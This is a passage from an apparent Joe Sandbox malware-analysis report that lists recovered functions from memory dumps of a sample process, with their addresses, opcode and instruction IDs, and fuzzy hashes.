                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b9244b9c89f0c1b79b8ded26c64d83a7bbee485bdcf51aa85031a5050188a60
                                                                                            • Instruction ID: 060445905f6d9dc90d10b26761d6aecb28254d46c254f3ed2ef231142fa034c9
                                                                                            • Opcode Fuzzy Hash: 1b9244b9c89f0c1b79b8ded26c64d83a7bbee485bdcf51aa85031a5050188a60
                                                                                            • Instruction Fuzzy Hash: B3D1CD74E002188FDB54DFA5C994BADBBB2FF89300F5481A9D809AB355DB356D81CF14
                                                                                            Function 004F4050 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22f6b39a192b66fed03ac9cb335231c1a374669b2d91d190f571aa847421b546
                                                                                            • Instruction ID: 1b7a142517ec35c432d147fb824e5de892ed183cd28d43975b09105e559be673
                                                                                            • Opcode Fuzzy Hash: 22f6b39a192b66fed03ac9cb335231c1a374669b2d91d190f571aa847421b546
                                                                                            • Instruction Fuzzy Hash: 38D1CD78E002188FDB54DFA5C990BADBBB2FF89300F6081A9D809AB355DB356D81CF54
                                                                                            Function 004F2068 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84c03ce9efa84813fc6fe88bf3db0c8555ea687b285f67205d15b82afc6bbed2
                                                                                            • Instruction ID: f1582d2421115f3fbf654bfff9f0f01db290896cc7c26f09ac486ef1fed3f6ad
                                                                                            • Opcode Fuzzy Hash: 84c03ce9efa84813fc6fe88bf3db0c8555ea687b285f67205d15b82afc6bbed2
                                                                                            • Instruction Fuzzy Hash: 5BD1BE78E00218CFDB54DFA5C994BADBBB2FF89300F5080A9D809AB355DB356981CF55
                                                                                            Function 004F6078 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75afd99edcb7e3123c38d6d65aa89de38a2919b3ca576ec0e51a05c8c1a36886
                                                                                            • Instruction ID: dfeff02cea80a5af58e54abfb69b2a2bbde25a92b4aac1fa1c1a7110ec16b243
                                                                                            • Opcode Fuzzy Hash: 75afd99edcb7e3123c38d6d65aa89de38a2919b3ca576ec0e51a05c8c1a36886
                                                                                            • Instruction Fuzzy Hash: 23D1BD78E00218CFDB54DFA5C990BADBBB2FF89300F6080A9D809AB355DB356981CF55
                                                                                            Function 004F0970 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d920ac0ee48db5b637733ed94a28193ed5febee747cbd1e4b88ae8cb987db2cf
                                                                                            • Instruction ID: 0c97b7df30643d9664ca11afa32dc60e76402d6ac8dfca197252e220d29a0b38
                                                                                            • Opcode Fuzzy Hash: d920ac0ee48db5b637733ed94a28193ed5febee747cbd1e4b88ae8cb987db2cf
                                                                                            • Instruction Fuzzy Hash: 83D1CE78E00218CFDB54DFA5C990BADBBB2FF89300F6481A9D808AB355DB356981CF55
                                                                                            Function 004F7770 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b11e3afd4a72be1dcd7b4305d57e637dba9001ca5cf0e4ae90c85bde1a56a199
                                                                                            • Instruction ID: a67a9a8716c1cc80decb380285cc7561609bc83fac4990d5538b77f5fb9aed26
                                                                                            • Opcode Fuzzy Hash: b11e3afd4a72be1dcd7b4305d57e637dba9001ca5cf0e4ae90c85bde1a56a199
                                                                                            • Instruction Fuzzy Hash: A6D1CE78E002188FDB54DFA5C990BADBBB2FF89300F6084A9D808AB355DB356D81CF50
                                                                                            Function 004F0E08 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad993c68b9baf4180de71acbd50fa5d83c78b800ee7c418d1f2557e810146f42
                                                                                            • Instruction ID: bc8f7f3c78f4c17949eb33223d2493ac2ce6092429374f1473294b6e18c485e3
                                                                                            • Opcode Fuzzy Hash: ad993c68b9baf4180de71acbd50fa5d83c78b800ee7c418d1f2557e810146f42
                                                                                            • Instruction Fuzzy Hash: CBD1CE78E00218CFDB54DFA5C990BADBBB2FF89300F5080A9D809AB355DB356981CF10
                                                                                            Function 004F2500 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5932f91bd9ae3a01be0ffa118d21763eea70e5f947cb187dbafdd25dc0f2956
                                                                                            • Instruction ID: ef1d89c03854d816837389f17d254cfe609854a7eedab971451daf18efb32832
                                                                                            • Opcode Fuzzy Hash: f5932f91bd9ae3a01be0ffa118d21763eea70e5f947cb187dbafdd25dc0f2956
                                                                                            • Instruction Fuzzy Hash: 7FD1BE78E002188FDB54DFA5C990BADBBB2FF89300F6084A9D809AB355DB356D81CF55
                                                                                            Function 004F4E18 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 27f46584a14acb5c43805c3687f4f2da2a030387e9abdaeeb4d97dce3f689c6d
                                                                                            • Instruction ID: bf5513a1d9aba6be901becaa0eb45770745b0f034e6fc07fd83b9b68ae244abc
                                                                                            • Opcode Fuzzy Hash: 27f46584a14acb5c43805c3687f4f2da2a030387e9abdaeeb4d97dce3f689c6d
                                                                                            • Instruction Fuzzy Hash: 37D1CE74E00218CFDB54DFA5C990BADBBB2FF89300F6081A9D808AB355DB356981CF50
                                                                                            Function 004F6510 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fca268941204eafbc9a21f35f3aab119a1447b55602792f2c26f3d8fbf280714
                                                                                            • Instruction ID: d82dea53dceee9a96006729ed88bba42f9b0cacbc509becde6763605b6700caa
                                                                                            • Opcode Fuzzy Hash: fca268941204eafbc9a21f35f3aab119a1447b55602792f2c26f3d8fbf280714
                                                                                            • Instruction Fuzzy Hash: C2D1BE78E002188FDB54DFA5C990BADBBB2FF89300F6480A9D809AB355DB356D81CF55
                                                                                            Function 004F1738 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 160d850deecf2206754a69be83362430d2a8fd7f74bc203a371d274dc8d6be9d
                                                                                            • Instruction ID: 77d6824bf47163f3174d4b8180d249dc824a007b475f30c3ddd141f0af9a3fab
                                                                                            • Opcode Fuzzy Hash: 160d850deecf2206754a69be83362430d2a8fd7f74bc203a371d274dc8d6be9d
                                                                                            • Instruction Fuzzy Hash: 54D1BE74E00218CFDB54DFA5C990BADBBB2FF89300F6084A9D809AB355DB356981CF55
                                                                                            Function 004F2E30 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff6ae3f887539afa39a518553c349363cfd9e7fc0d1ce7bec9353281b1901faa
                                                                                            • Instruction ID: e6a29b07e65373da0affa3cb2dbebf5d561671c65c0e2d00376ef38c707a8b7b
                                                                                            • Opcode Fuzzy Hash: ff6ae3f887539afa39a518553c349363cfd9e7fc0d1ce7bec9353281b1901faa
                                                                                            • Instruction Fuzzy Hash: 4BD1CE74E002188FDB54DFA5C990BADBBB2FF89300F6084A9D809AB355DB356E81CF15
                                                                                            Function 004F32C8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a459743148c9b98319ecf82cd4f6c20212fb7d16051e26bce9551cb1c386b72
                                                                                            • Instruction ID: 0250d87f17e0f4550ee59c2a59a7c53271869c56b0643c08812aaecf86c5222e
                                                                                            • Opcode Fuzzy Hash: 9a459743148c9b98319ecf82cd4f6c20212fb7d16051e26bce9551cb1c386b72
                                                                                            • Instruction Fuzzy Hash: 3BD1BF78E00218CFDB54DFA5C991BADBBB2FF89300F5080A9D809AB355DB356A81CF55
                                                                                            Function 004F04D8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b9244b9c89f0c1b79b8ded26c64d83a7bbee485bdcf51aa85031a5050188a60
                                                                                            • Instruction ID: 5929c06c34e3bd3172820a87623bf8047de6d544e9e6964dd32c64c5c540419c
                                                                                            • Opcode Fuzzy Hash: 1b9244b9c89f0c1b79b8ded26c64d83a7bbee485bdcf51aa85031a5050188a60
                                                                                            • Instruction Fuzzy Hash: 6BD1CE78E00218CFDB54DFA5C990BADBBB2FF89300F5481A9D809AB355DB356981CF54
                                                                                            Function 004F72D8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eb8abb71de6576724baf5bcbd56c938f39c83ecf7b71d2617d8e7967337cd599
                                                                                            • Instruction ID: de642a041de929aff8af7432c7720b0204ece7cde601128e41b33c1ca8a37a97
                                                                                            • Opcode Fuzzy Hash: eb8abb71de6576724baf5bcbd56c938f39c83ecf7b71d2617d8e7967337cd599
                                                                                            • Instruction Fuzzy Hash: C0D1BD78E00218CFDB54DFA5C990BADBBB2FF89300F6480A9D809AB355DB356981CF55
                                                                                            Function 004F1BD0 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74228d3ffb77723ff9e1e0903b42097791c7237bdff97a5697f823d05eb11320
                                                                                            • Instruction ID: 0dd3b8008a972fcad4c0baf1d6fb4a21571b527c1c34339a2892797a0a5bfa23
                                                                                            • Opcode Fuzzy Hash: 74228d3ffb77723ff9e1e0903b42097791c7237bdff97a5697f823d05eb11320
                                                                                            • Instruction Fuzzy Hash: 54D1BD78E00218CFDB54DFA5C990BADBBB2FF89300F5084A9D809AB355DB356981CF55
                                                                                            Function 004F44E8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e9b7a93bb37e9f9cdcbdd2e96d5bfa03accde22470f14527ae8fa3ced232c444
                                                                                            • Instruction ID: 59ed83ae3e107dad700528fb87ff1cb634e423215f75ebff23988f9a34c63473
                                                                                            • Opcode Fuzzy Hash: e9b7a93bb37e9f9cdcbdd2e96d5bfa03accde22470f14527ae8fa3ced232c444
                                                                                            • Instruction Fuzzy Hash: ADD1BE74E002188FDB54DFA5C990BAEBBB2FF89300F5080A9D809AB355DB356D81CF55
                                                                                            Function 004F5BE0 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b7f2f781c45e0baf58edf051add1cda8aa2f6fcc619a26a6d87d6bfbe840933
                                                                                            • Instruction ID: cf27d1fd91b0b2a392587765d7648a7ce6f31350fa2fad9e27c5a41221a03bd3
                                                                                            • Opcode Fuzzy Hash: 4b7f2f781c45e0baf58edf051add1cda8aa2f6fcc619a26a6d87d6bfbe840933
                                                                                            • Instruction Fuzzy Hash: 40D1CD74E002188FDB54DFA5C990BADBBB2FF89300F6080A9D809AB355DB356A81CF14
                                                                                            Function 004F4980 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e8ffe0cad2ae67f2cc6fd93dfe83d162036b2fcb5476c6b9237427a46bb04da
                                                                                            • Instruction ID: 240880fbcba18428e32102d00fec2ff6c5e50a5d6119c346c4342fd7fcaca374
                                                                                            • Opcode Fuzzy Hash: 9e8ffe0cad2ae67f2cc6fd93dfe83d162036b2fcb5476c6b9237427a46bb04da
                                                                                            • Instruction Fuzzy Hash: 51D1CE78E00218CFDB54DFA5C994BADBBB2FF89300F6080A9D809AB355DB356981CF55
                                                                                            Function 004F2998 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b06d40c613307a82d8dbf40402f2f0022d3bf1940735a88eb8bace868a6e1870
                                                                                            • Instruction ID: 502a0c834b89f6313e7694601cb25c9d771afa0103aa38186b84dd9c8d2e4f2b
                                                                                            • Opcode Fuzzy Hash: b06d40c613307a82d8dbf40402f2f0022d3bf1940735a88eb8bace868a6e1870
                                                                                            • Instruction Fuzzy Hash: 4CD1CD78E002188FDB54DFA5C990BADBBB2FF89300F6080A9D809AB355DB356981CF55
                                                                                            Function 004F69A8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0f7cc4c6dd4c99e9c45101feeb659553c830b740f5e48d693cd0f8acb3ad1a7
                                                                                            • Instruction ID: d0658a0aeaa1483962bf0becb98b942f86f78120cd4591f840db454e2041c4d0
                                                                                            • Opcode Fuzzy Hash: c0f7cc4c6dd4c99e9c45101feeb659553c830b740f5e48d693cd0f8acb3ad1a7
                                                                                            • Instruction Fuzzy Hash: 36D1BD78E002188FDB54DFA5C990BADBBB2FF89300F6481A9D809AB355DB356981CF54
                                                                                            Function 004F12A0 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 327690054a8d8b76213c3487183daa6536139a2afa61760b21a6ffaa6a35a2ce
                                                                                            • Instruction ID: d41cd403984b54069e2f6f7ab91bfffbf9ccc2e97a4f172b4fcfc7eb045f8aa6
                                                                                            • Opcode Fuzzy Hash: 327690054a8d8b76213c3487183daa6536139a2afa61760b21a6ffaa6a35a2ce
                                                                                            • Instruction Fuzzy Hash: 69D1BD78E00218CFDB54DFA5C990BADBBB2FF89300F6480A9D809AB355DB356981CF54
                                                                                            Function 004F3BB8 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d83295530b5b1e2ec7c97c06b2af4258903fc31403e4870c447933a0ff611821
                                                                                            • Instruction ID: 2cac89be0f3d5af37d620ce9a8e87b4bce2755666ff2ae670fa0137906373d46
                                                                                            • Opcode Fuzzy Hash: d83295530b5b1e2ec7c97c06b2af4258903fc31403e4870c447933a0ff611821
                                                                                            • Instruction Fuzzy Hash: 7DD1BE78E00218CFDB54DFA5C990BADBBB2FF89300F5081A9D809AB355DB356A81CF54
                                                                                            Function 004F52B0 Relevance: .3, Instructions: 272COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d937478887f35a80f142fb3c960f53bd02bdfae4df6af667a043d085c54c58d
                                                                                            • Instruction ID: 0259cb3d97adbca76245f9c8e7194fbe24e77589f9e8b038a195608cca53a161
                                                                                            • Opcode Fuzzy Hash: 0d937478887f35a80f142fb3c960f53bd02bdfae4df6af667a043d085c54c58d
                                                                                            • Instruction Fuzzy Hash: A7D1CD74E00218CFDB54DFA5C990BADBBB2FF89300F6084A9D909AB355DB356981CF54
                                                                                            Function 006BAA68 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c364998914506a7befeac6d38e9d9c474aaaf8428f5f3397c55608134f1c2836
                                                                                            • Instruction ID: 9284a5e5ecc529180082ace49da158fbcf7dd64f1f6b26deaa6f19fcba4d1273
                                                                                            • Opcode Fuzzy Hash: c364998914506a7befeac6d38e9d9c474aaaf8428f5f3397c55608134f1c2836
                                                                                            • Instruction Fuzzy Hash: 6DC1B074E01218CFDB54DFA5C994BADBBB2BF89300F2084A9D409AB395DB359E85CF50
                                                                                            Function 006BC478 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 490de2f27c1d48331894dcce376c6806ea2a19bffd55283669e5afff7ba50685
                                                                                            • Instruction ID: 9bed5a95d1dc87a3762a34aab694f53873604b7f7905742ce34723542e5e6090
                                                                                            • Opcode Fuzzy Hash: 490de2f27c1d48331894dcce376c6806ea2a19bffd55283669e5afff7ba50685
                                                                                            • Instruction Fuzzy Hash: D0C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB395DB35AE81CF50
                                                                                            Function 006B3D78 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c32dd6814b223f633c93c2bd4d6567eedfcdf6b140c30609bca5b66e419a4e12
                                                                                            • Instruction ID: 9ee5ce4649afe8f7817559964d02a9587f762cc898b4f91ed13570158b43bc81
                                                                                            • Opcode Fuzzy Hash: c32dd6814b223f633c93c2bd4d6567eedfcdf6b140c30609bca5b66e419a4e12
                                                                                            • Instruction Fuzzy Hash: 50C1C174E01218CFDB54DFA5C994BADBBB2BF89300F1084A9D409AB355DB359E81CF50
                                                                                            Function 006B3070 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7874a0d160ef9af8a37e15671c79d24278d47b9ab1207ce550ae331b1b47a739
                                                                                            • Instruction ID: 4ec3090c58301b77ed358bda1aec720d7cb5474f79026955c3969f62ffe70623
                                                                                            • Opcode Fuzzy Hash: 7874a0d160ef9af8a37e15671c79d24278d47b9ab1207ce550ae331b1b47a739
                                                                                            • Instruction Fuzzy Hash: 34C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F1084A9D409AB355EB359E85CF50
                                                                                            Function 006BB770 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4a5d6e2b36ca6a0f05b904c03fcecf14fd327b4a942ba32ac1705a856950cd10
                                                                                            • Instruction ID: a514f9d71d2315c41ae3c5b569bc1907cd9f1fd71c4d856097bea46a42cb6cb1
                                                                                            • Opcode Fuzzy Hash: 4a5d6e2b36ca6a0f05b904c03fcecf14fd327b4a942ba32ac1705a856950cd10
                                                                                            • Instruction Fuzzy Hash: B3C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB395DB359E81CF50
                                                                                            Function 006B7A48 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 96edcaaa0809ac3a5d64282fc7bc5d78e8f10ac2bde084b33204cf62fd7cf077
                                                                                            • Instruction ID: 0d80c9dd0f724b5530ddb4b774634b846b67b9c51eeb743c16a81e6e1592b2b4
                                                                                            • Opcode Fuzzy Hash: 96edcaaa0809ac3a5d64282fc7bc5d78e8f10ac2bde084b33204cf62fd7cf077
                                                                                            • Instruction Fuzzy Hash: 96C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F1084A9D809AB395EB359E81CF50
                                                                                            Function 006B6D40 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 055a6afef93f6cec94fd3c99832508c1e247c00c91321a1fba4d6db58442e023
